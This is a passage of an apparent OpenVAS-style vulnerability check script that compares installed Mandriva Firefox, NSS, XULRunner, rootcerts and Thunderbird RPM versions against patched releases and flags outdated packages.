if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-oc\", rpm:\"firefox-oc~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.36mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.27\", rpm:\"libxulrunner1.9.2.27~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.37mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.13.1~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.27\", rpm:\"lib64xulrunner1.9.2.27~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.27~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ast\", rpm:\"firefox-ast~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_BD\", rpm:\"firefox-bn_BD~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn_IN\", rpm:\"firefox-bn_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-br\", rpm:\"firefox-br~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bs\", rpm:\"firefox-bs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_ZA\", rpm:\"firefox-en_ZA~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_CL\", rpm:\"firefox-es_CL~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_MX\", rpm:\"firefox-es_MX~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fa\", rpm:\"firefox-fa~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gd\", rpm:\"firefox-gd~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hr\", rpm:\"firefox-hr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hy\", rpm:\"firefox-hy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kk\", rpm:\"firefox-kk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lg\", rpm:\"firefox-lg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mai\", rpm:\"firefox-mai~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ml\", rpm:\"firefox-ml~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nso\", rpm:\"firefox-nso~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-or\", rpm:\"firefox-or~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta\", rpm:\"firefox-ta~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta_LK\", rpm:\"firefox-ta_LK~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-vi\", rpm:\"firefox-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zu\", rpm:\"firefox-zu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird\", rpm:\"mozilla-thunderbird~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ar\", rpm:\"mozilla-thunderbird-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-be\", 